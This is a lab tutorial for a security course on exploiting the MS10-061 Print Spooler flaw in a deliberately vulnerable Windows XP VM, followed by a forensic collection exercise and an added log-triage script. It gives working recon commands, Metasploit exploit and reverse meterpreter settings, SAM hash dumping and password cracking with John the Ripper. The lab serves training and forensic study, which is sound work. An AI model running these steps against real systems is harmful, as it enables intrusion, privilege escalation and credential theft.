(Metasploit: MS10-061)

{ Kali 1.0: Detect NetBIOS Printer Shares, Gain Access, and Obtain Forensic Files }


Section 0. Background Information
  1. What is the scenario?
    • Have you ever heard about how a malicious perpetrator was able to connect to a shared printer and later gain Administrator privileges on that machine?  Well, attackers can use the same technique as Stuxnet to gain privileges on Windows XP and Windows 2003 Servers that are sharing printers.  This lesson will show you how to (1) perform the reconnaissance to view this potential vulnerability, (2) perform the exploitation, and (3) collect the forensic files for a later investigation.

  2. What is Metasploit?
    • The Metasploit Framework is an open source penetration testing tool used for developing and executing exploit code against a remote target machine.  The Metasploit Framework has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the vulnerability of computer systems in order to protect them, and on the other hand it can also be used to break into remote systems.

  3. What is Helix?
    • Helix is a customized distribution of the Knoppix Live Linux CD. It focuses on incident response and computer forensics.  Helix is more than just a bootable live CD. With Helix you can boot into a robust Linux environment that includes (1) customizable Linux kernels, (2) excellent hardware detection and (3) many applications dedicated to Incident Response and Forensics.

  4. What is the Microsoft Print Spooler Service Impersonation Vulnerability?
    • The ms10_061_spoolss module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild.

  5. References
  6. Pre-Requisite Lab
    1. Damn Vulnerable Windows XP: Lesson 1: How to create a Damn Vulnerable Windows XP Machine
    2. Kali: Lesson 1: Installing Kali 1.0

  7. Post-Requisite Lab
    1. Volatility 2.2: Lesson 3: Analyzing the Memory Dump of a MS10-061 Attack

  8. Lab Notes
    • In this lab we will do the following:
      1. Download Helix2008R1
      2. Perform NMAP NetBios and RPC Scan
      3. Perform NetBios Share Reconnaissance
      4. Use Metasploit Module ms10_061_spoolss to connect to victim
      5. Collect Basic Forensic Files
      6. Perform Remote Forensic Memory Capture with Helix
      7. Download Basic Forensic Files

  9. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2015 No content replication of any kind is allowed without express written permission.

 

Section 1: Download Helix
  1. Open Firefox
    • Instructions:
      1. Click the Start Button
      2. Type firefox in the search box
      3. Click the firefox icon

     

  2. Start Helix Download
    • Instructions:
      1. Navigate to the following URL
        • http://helix.onofri.org/Helix2008R1.iso
      2. Select Save File radio button
      3. Click the OK button

     

  3. Save Helix
    • Instructions:
      1. Navigate to your desired destination directory
        • In my case, C:\CSS\ISOs
      2. File name: Helix2008R1.iso
      3. Save as type: ISO Image File (*.iso)
      4. Click the Save button

 

Section 2: Start Your Damn Vulnerable WXP-SP2 VM
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine settings

     

  3. Configure CD/DVD (IDE)
    • Instructions:
      1. Select CD/DVD (IDE)
      2. Click on the Use physical drive: radio button
      3. Select Auto detect
    • Note(FYI):
      1. Do not click on the OK Button

     

  4. Configure Network Adapter
    • Instructions:
      1. Select Network Adapter
      2. Click the radio button "Bridged: Connected directly to the physical network"
      3. Click the OK button

     

  5. Start Damn Vulnerable WXP-SP2
    • Instructions
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine

     

Section 3: Login to Damn Vulnerable WXP-SP2
  1. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Administrator
      2. Password: Supply Password
      3. Press <Enter> or Click the Arrow

     

Section 4: Verify you have a Network IP Address
  1. Open the Command Prompt
    • Instructions:
      1. Click the Start Button
      2. All Programs --> Accessories --> Command Prompt

     

  2. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
      2. Record Your IP Address
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.117.
      • This is the IP Address of the Victim Machine.

     

Section 5: Create Shared Printer
  1. Open Control Panel (On Damn Vulnerable WXP-SP2)
    • Instructions:
      1. Click the Start Button
      2. All Programs --> Control Panel

     

  2. Open Printers and Faxes
    • Instructions:
      1. Double Click on Printers and Faxes

     

  3. Add Printer
    • Instructions:
      1. Right Click in white portion of the Printers and Faxes Screen
      2. Click Add Printer

     

  4. Add Printer Wizard
    • Instructions:
      1. Click the Next Button

     

  5. Add Printer Wizard (Local or Network Printer)
    • Instructions:
      1. Select Local printer attached to this computer
      2. Click the Next Button

     

  6. Add Printer Wizard (Select a Printer Port)
    • Instructions:
      1. Select Use the following port:
      2. Select LPT1: (Recommended Printer Port)
      3. Click the Next Button

     

  7. Add Printer Wizard (Install Printer Software)
    • Instructions:
      1. Manufacturer: Canon
      2. Printers: Select the first printer in the list
      3. Click the Next Button

     

  8. Add Printer Wizard (Use Existing Driver)
    • Instructions:
      1. Select Keep existing driver (recommended)
      2. Click the Next Button

     

  9. Add Printer Wizard (Name Your Printer)
    • Instructions:
      1. Printer name: CANON
      2. Do you want to use this printer as the default printer? Yes
      3. Click the Next Button

     

  10. Add Printer Wizard (Printer Sharing)
    • Instructions:
      1. Click Share name:
      2. Share name: CANON
      3. Click the Next Button

     

  11. Add Printer Wizard (Location and Comment)
    • Instructions:
      1. Click the Next Button

     

  12. Add Printer Wizard (Print Test Page)
    • Instructions:
      1. Do you want to print a test page? No
      2. Click the Next Button

     

  13. Add Printer Wizard (Completing the Add Printer Wizard)
    • Instructions:
      1. Click the Finish Button

 

Section 6: Configure Kali Virtual Machine Settings
  1. Open VMware Player on your windows machine.
    • Instructions:
      1. Click the Start Button
      2. Type "vmware player" in the search box
      3. Click on VMware Player

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Kali
      2. Edit Virtual Machine Settings
    • Note:
      • Before beginning a lesson it is necessary to check the following VM settings.

     

  3. Configure CD/DVD
    • Instructions:
      1. Click on CD/DVD (IDE)
      2. Click on the radio button "Use physical drive:"
      3. Select Auto detect

     

  4. Set Network Adapter
    • Instructions:
      1. Click on Network Adapter
      2. Click on the radio button "Bridged: Connected directly to the physical network".
      3. Click the OK Button

     

Section 7: Play and Login to Kali
  1. Start Up Kali
    • Instructions:
      1. Click on Kali
      2. Play virtual machine

     

  2. Supply Username
    • Instructions:
      1. Click Other...
      2. Username: root
      3. Click the Log In Button

     

  3. Supply Password
    • Instructions:
      1. Password: <Provide your Kali root password>
      2. Click the Log In Button

     

  4. Open a Terminal Window
    • Instructions:
      1. Click on Applications
      2. Accessories --> Terminal

     

  5. Obtain Kali's IP Address
    • Instructions:
      1. ifconfig
      2. Record your IP Address
    • Note(FYI):
      • Command #1, ifconfig is used to display Kali's IP Address.
      • Command #2, Record Your IP Address. 
        • Mine is 192.168.1.116
        • Yours will probably be different.

 

Section 8: Printer Share Reconnaissance
  1. NMAP Share Search
    • Notes(FYI):
      • Replace 192.168.1.117 with your Damn Vulnerable WXP-SP2 address found in (Section 4, Step 2).
    • Instructions:
      1. nmap -sS -sU -O -p137-139,445 192.168.1.117
      2. Notice that (1) netbios-ssn service is open on port 139/tcp,  (2) microsoft-ds is open on port 445/tcp, and (3) the Operating System is Windows XP.
    • Notes(FYI):
      • Command #1, Use the nmap TCP SYN Scan (-sS) and UDP Scan (-sU) to quickly scan Damn Vulnerable WXP-SP2 for the NetBIOS ports 137 to 139, and 445.  Also, use the OS detection flag (-O) to provide the OS version of the scanned machine.
      • NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model allowing applications on separate computers to communicate over a local area network.
      • TCP port 445 is used for direct TCP/IP Microsoft Networking access without the need for a NetBIOS layer. The SMB (Server Message Block) protocol is used among other things for file sharing in Windows NT/2K/XP.
      • Gold Nuggets: The Operating System is Windows XP with NetBIOS listening on port 139 and SMB is listening on port 445.  In the following steps, we will use (nmblookup) to query TCP/139 for NetBIOS Shares.  TCP/445 will be used to launch the RPC service impersonation vulnerability against the Print Spooler Service.

     

  2. Lookup NetBIOS names
    • Notes(FYI):
      • Replace 192.168.1.117 with your Damn Vulnerable WXP-SP2 address found in (Section 4, Step 2).
    • Instructions:
      1. nmblookup -A 192.168.1.117
    • Notes(FYI):
      • nmblookup is used to query NetBIOS names and map them to IP addresses in a network using NetBIOS over TCP/IP queries. The options allow the name queries to be directed at a particular IP broadcast area or to a particular machine.
      • Command #1, Use nmblookup to query Damn Vulnerable WXP-SP2 for its NetBIOS Workstation and Group Names.
      • Gold Nugget: Notice that WXPSP2 is your NetBIOS Workstation Name.  Now we have the final piece of reconnaissance we need (WXPSP2) in order to query for NetBIOS shares including printers.

     

  3. Access SMB Resources
    • Notes(FYI):
      • Replace 192.168.1.117 with your Damn Vulnerable WXP-SP2 address found in (Section 4, Step 2).
    • Instructions:
      1. smbclient -L \\WXPSP2 -I 192.168.1.117 -N
    • Notes(FYI):
      • Command #1, Use smbclient to access SMB resources.  In this case, use (-L) to list what services are available on the NetBIOS Workstation named WXPSP2.  Use (-I) if your NetBIOS name does not match the TCP/IP DNS host name or if you are trying to reach a host on another network.  Use (-N) to suppress the password prompt.  This is for scripting purposes.
      • Server Message Block (SMB) operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network.
      • Gold Nugget: The NetBIOS Workstation named (WXPSP2) is sharing a printer named CANON.

 

Section 9: It's Metasploit Time
  1. Start msfconsole
    • Instructions:
      1. msfconsole
    • Note(FYI):
      • Command #1, The msfconsole provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the MSF.
      • Your picture will probably be different than mine. If you want to change your picture, you can type banner.

     

  2. Use ms10_061_spoolss exploit
    • Instructions:
      1. search ms10_061
      2. use exploit/windows/smb/ms10_061_spoolss
    • Note(FYI):
      • Command #1, Search the MSF repository for the MS10-061 exploit module.
      • Command #2, Use the MS10-061 exploit module.

     

  3. View MS10-061 Information
    • Instructions:
      1. info
      2. View the Description
    • Note(FYI):
      • Command #1, Among the various details, the info command provides the author, description and references about the particular exploit.

     

  4. Set Payload
    • Instructions:
      1. set PAYLOAD windows/meterpreter/reverse_tcp
    • Note(FYI):
      • Command #1, This payload allows the attacker to connect back to the victim and injects the Meterpreter server DLL via the Reflective DLL Injection payload (staged).

     

  5. Show Options
    • Instructions:
      1. show options
    • Note(FYI):
      • Command #1, This command displays which settings are available and/or required for that specific module.  RHOST is required and PNAME is available for the exploit module (ms10_061_spoolss).  LHOST is required for the payload (windows/meterpreter/reverse_tcp).

     

  6. Set LHOST, RHOST and PNAME
    • Notes(FYI):
      • Replace 192.168.1.116 with your Kali IP Address found in (Section 7, Step 5).
      • Replace 192.168.1.117 with your Damn Vulnerable WXP-SP2 IP Address found in (Section 4, Step 2).
      • Replace CANON with the name of the printer you created in (Section 5, Step 9).
    • Instructions:
      1. ifconfig
      2. set LHOST 192.168.1.116
      3. set RHOST 192.168.1.117
      4. set PNAME CANON
    • Note(FYI):
      • Command #1, ifconfig is used to display the IP Address of the primary network interface of the Kali machine.
      • Command #2, LHOST is the attacking machine (Kali).
      • Command #3, RHOST is the victim machine (Damn Vulnerable WXP-SP2).
      • Command #4, PNAME is the name of the victim machine's printer.

     

  7. Engage Exploit
    • Instructions:
      1. exploit
      2. Notice the malicious executable gets written to C:\WINDOWS\system32.  This executable is used to connect back to port 4444 on the Kali attack machine. Record your Malicious Executable, mine is named (W75nXA97wkv3RI.exe).
      3. Notice the malicious print request that is written to C:\WINDOWS\system32\wbem\mof.  This request is used to control execution of the malicious executable above.
      4. Notice that a Meterpreter session is now created between Kali and Damn Vulnerable WXP-SP2.
    • Note(FYI):
      • Command #1, Executes the exploit.

     

  8. Understanding the Exploit
    • Instructions:
      1. getuid
      2. getpid
        • Record your PID, which will be used in Step #4.  Mine is 196.
      3. shell
      4. tasklist /v /fi "PID eq 196"
        • Replace (196) with your PID recorded in Step #2.
      5. netstat -nao | findstr "196"
        • Replace (196) with your PID recorded in Step #2.
    • Note(FYI):
      • Command #1, getuid will display the user that the Meterpreter server is running as on the victim machine.  Consequently, NT AUTHORITY\SYSTEM is the Administrator account.
      • Command #2, getpid provides the Process ID (PID) of the Meterpreter session that is running on the victim machine.  My PID is (196).
      • Command #3, shell provides command line access to the Windows Machine.
      • Command #4, This command will display a list of applications and associated tasks/processes that are currently running on the local machine. Flag Explanation: (/v) display a verbose list of processes; (/fi) is a filter; and ("PID eq 196") filter or display only a PID that matches 196.
      • Command #5, netstat displays network connections.  Flag Explanation: (-n) Displays addresses and port numbers in numerical form; (-a) Displays all connections and listening ports; and (-o) Displays the owning process ID associated with each connection.

     

  9. Basic Forensic Files
    • Instructions:
      1. tasklist > forensics_tasklist.txt
      2. netstat -nao > forensics_netstat.txt
      3. dir > forensics_dir.txt
      4. exit
    • Note(FYI):
      • Command #1, Redirect the output created by tasklist into a file called forensics_tasklist.txt.
      • Command #2, Redirect the output created by netstat into a file called forensics_netstat.txt.
      • Command #3, Redirect the output created by dir into a file called forensics_dir.txt. 
      • Command #4, Exit the command shell and return to the meterpreter prompt.

     

  10. Obtain SAM Database
    • Instructions:
      1. hashdump
      2. Highlight and Right Click the lines displayed by hashdump.
      3. Select Copy.
    • Note(FYI):
      • Command #1, hashdump will display the contents of the SAM database.
      • The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista and Windows 7 that stores users' passwords.

     

  11. Open the GNOME Text Editor
    • Instructions:
      1. gnome-text-editor samhash.txt
    • Note(FYI):
      • Command #1, Open a file (samhash.txt) using the gnome-text-editor.

     

  12. Paste SAM Database Contents
    • Instructions:
      1. Edit --> Paste

     

  13. Save File
    • Instructions:
      1. File --> Save

     

  14. Close File
    • Instructions:
      1. File --> Quit
      2. Click on the Second Terminal Window

 

Section 10: Setup Forensic File Collection
  1. Memory Collection Preparation (On Kali)
    • Instructions:
      1. mkdir -p /forensics/ms10_061
      2. cd /forensics/ms10_061
      3. nc -l -vvv -p 8888 > ms10_061.dd
    • Note(FYI):
      • Command #1, Create a directory called /forensics/ms10_061. Use (-p) to suppress an error if the directory already exists.
      • Command #2, Change Directory into /forensics/ms10_061.
      • Command #3, Create a netcat listener (-l) on port (-p) 8888 in extreme verbose mode (-vvv) redirecting (>) output into a file (ms10_061.dd).

 

Section 11: Collect Victim Memory
  1. Enter Virtual Machine Settings (On Damn Vulnerable WXP-SP2)
    • Instructions:
      1. Click on Player
      2. Click on Virtual Machine Settings

     

  2. Configure CD/DVD Settings
    • Instructions:
      1. Click on CD/DVD(IDE)
      2. Check Connected
      3. Select Use ISO image file:
      4. Click the Browse Button
      5. Navigate to the Helix2008R1.iso
        • In my case, C:\CSS\ISOs\Helix2008R1.iso
      6. Click the OK Button

     

  3. Helix (Accept Risk)
    • Instructions:
      1. Click the Accept Button

     

  4. Helix (Live Acquisition)
    • Notes(FYI):
      • Replace 192.168.1.116 with your Kali IP Address found in (Section 7, Step 5).
    • Instructions:
      1. Click on the Camera
      2. Source: \\PhysicalMemory - [521 MB]
      3. Location Options: Netcat
      4. Destination IP: 192.168.1.116
      5. Port: 8888
      6. Click the Acquire Button

     

  5. Helix (Start Memory Capture)
    • Instructions:
      1. Click the Yes Button
    • Notes(FYI):
      • Use dd.exe to copy the Physical Memory of the victim machine over the network to the netcat session running on Kali.

     

  6. Helix (Copying Physical Memory)
    • Instructions:
      1. The Black Command Window will disappear once the memory copy from the victim machine to Kali completes.

 

Section 12: Retrieve Victim Files
  1. Memory Copy Results (On Kali)
    • Instructions:
      1. Netcat will display the number of bits received.
      2. ls -l ms10_061.dd
      3. In the bottom tray, click on the first terminal window, which should contain your Meterpreter session.
    • Notes(FYI):
      • Command #2, You now have a binary memory capture of the victim machine, that we will analyze in a subsequent lesson.

     

  2. Download Forensic Files
    • Notes(FYI):
      • In substep #4, replace (W75nXA97wkv3RI.exe) with your malicious executable found in (Section 9, Step 7).
    • Instructions:
      1. pwd
      2. download C:\\WINDOWS\\system32\\forensics_tasklist.txt /forensics/ms10_061/
      3. download C:\\WINDOWS\\system32\\forensics_netstat.txt /forensics/ms10_061/
      4. download C:\\WINDOWS\\system32\\forensics_dir.txt /forensics/ms10_061/
      5. download C:\\WINDOWS\\system32\\W75nXA97wkv3RI.exe /forensics/ms10_061/
      6. In the bottom tray, click on the second terminal window, which should contain your Forensic Folder.
    • Notes(FYI):
      • Command #2-5, Download the forensics_tasklist.txt, forensics_netstat.txt, forensics_dir.txt, W75nXA97wkv3RI.exe files from the victim machine and place in the /forensics/ms10_061 destination directory on Kali.

 

Section 13: John The Ripper
  1. John The Ripper
    • Instructions:
      1. cp /samhash.txt .
      2. grep -i admin samhash.txt > adminhash.txt
      3. cat /dev/null > /root/.john/john.pot
      4. john --format=nt adminhash.txt
    • Notes(FYI):
      • Command #1, Copy samhash.txt from the slash (/) directory to the current (.) directory.
      • Command #2, Use grep to search for the string (admin) in file (samhash.txt), while ignoring the case (-i).  Create a file named adminhash.txt, by redirecting (>) the search results of the grep command into adminhash.txt

     

Section 14: Proof of Lab
  1. Proof of Lab (Basic Process Forensics)
    • Instructions:
      1. ls -lrta
      2. grep "4444" *.txt
        • Record your PID, mine is 196.
      3. grep "196" forensics_tasklist.txt
        • Replace (196) with your PID.
        • Record your malicious executable, mine is W75nXA97wkv3RI.exe
      4. grep "W75nXA97wkv3RI.exe" forensics_tasklist.txt
        • Replace (W75nXA97wkv3RI.exe) with your malicious executable
      5. grep "W75nXA97wkv3RI.exe" forensics_dir.txt
        • Replace (W75nXA97wkv3RI.exe) with your malicious executable
      6. date
      7. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Note(FYI):
      • In a subsequent lesson, we will use Volatility to analyze the memory capture in relation to your forensics_*.txt files.
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Paste into a word document
      3. Upload to Moodle
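
The correlation done by hand in Section 14 (remote port 4444, then PID, then image name) can be done with exact field matches, since a substring grep for "196" or "4444" also hits values such as PID 1196 or a memory size of 4,196 K. This is an added example, not part of the original lab: the function names are hypothetical and the sample captures are constructed (only 192.168.1.116/117, PID 196 and W75nXA97wkv3RI.exe come from the lab text).

```sh
#!/bin/sh
# Added example (not from the original lab): exact-match triage of the
# forensics_netstat.txt and forensics_tasklist.txt captures.

# pids_for_remote_port FILE PORT
# Print the owning PID of each TCP row in `netstat -nao` output whose Foreign
# Address port is exactly PORT. CRs are stripped: the files come from Windows.
pids_for_remote_port() {
    tr -d '\r' < "$1" | awk -v port="$2" '
        $1 == "TCP" && NF == 5 {
            n = split($3, a, ":")
            if (a[n] == port) print $5
        }' | sort -un
}

# image_for_pid FILE PID
# Print the Image Name for PID in table-format `tasklist` output. Column widths
# are read from the ===== ruler, so image names containing spaces stay intact.
image_for_pid() {
    tr -d '\r' < "$1" | awk -v pid="$2" '
        /^=+ =+/ && !w1 { w1 = length($1); w2 = length($2); next }
        w1 {
            name = substr($0, 1, w1); sub(/ +$/, "", name)
            p = substr($0, w1 + 2, w2); gsub(/ /, "", p)
            if (p == pid) print name
        }'
}

# triage DIR PORT
# Print "PID<TAB>Image Name" for every process talking to remote PORT.
triage() {
    for pid in $(pids_for_remote_port "$1/forensics_netstat.txt" "$2"); do
        printf '%s\t%s\n' "$pid" \
            "$(image_for_pid "$1/forensics_tasklist.txt" "$pid")"
    done
}

# make_sample DIR
# Write constructed captures with CRLF line endings. The rows for PID 1196 are
# distractors that a substring grep for "196" or "4444" would also match.
make_sample() {
    ruler='================================'
    {
        printf '\r\nActive Connections\r\n\r\n'
        printf '  %-6s %-22s %-22s %-15s %s\r\n' \
            Proto 'Local Address' 'Foreign Address' State PID \
            TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 952 \
            TCP 192.168.1.117:1045 192.168.1.116:4444 ESTABLISHED 196 \
            TCP 192.168.1.117:1196 192.168.1.116:44445 TIME_WAIT 0 \
            UDP 0.0.0.0:4444 '*:*' '' 1196
    } > "$1/forensics_netstat.txt"
    {
        printf '\r\n%-25s %6s %-16s %8s %12s\r\n' \
            'Image Name' PID 'Session Name' 'Session#' 'Mem Usage'
        printf '%.25s %.6s %.16s %.8s %.12s\r\n' \
            "$ruler" "$ruler" "$ruler" "$ruler" "$ruler"
        printf '%-25s %6s %-16s %8s %12s\r\n' \
            'System Idle Process' 0 Console 0 '28 K' \
            svchost.exe 1196 Console 0 '4,196 K' \
            W75nXA97wkv3RI.exe 196 Console 0 '2,512 K'
    } > "$1/forensics_tasklist.txt"
}

# Demo on the constructed captures; prints: 196<TAB>W75nXA97wkv3RI.exe
demo_dir=$(mktemp -d)
make_sample "$demo_dir"
triage "$demo_dir" 4444
rm -rf "$demo_dir"
```

Against the files downloaded in Section 12, the equivalent call is `triage /forensics/ms10_061 4444`.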

     


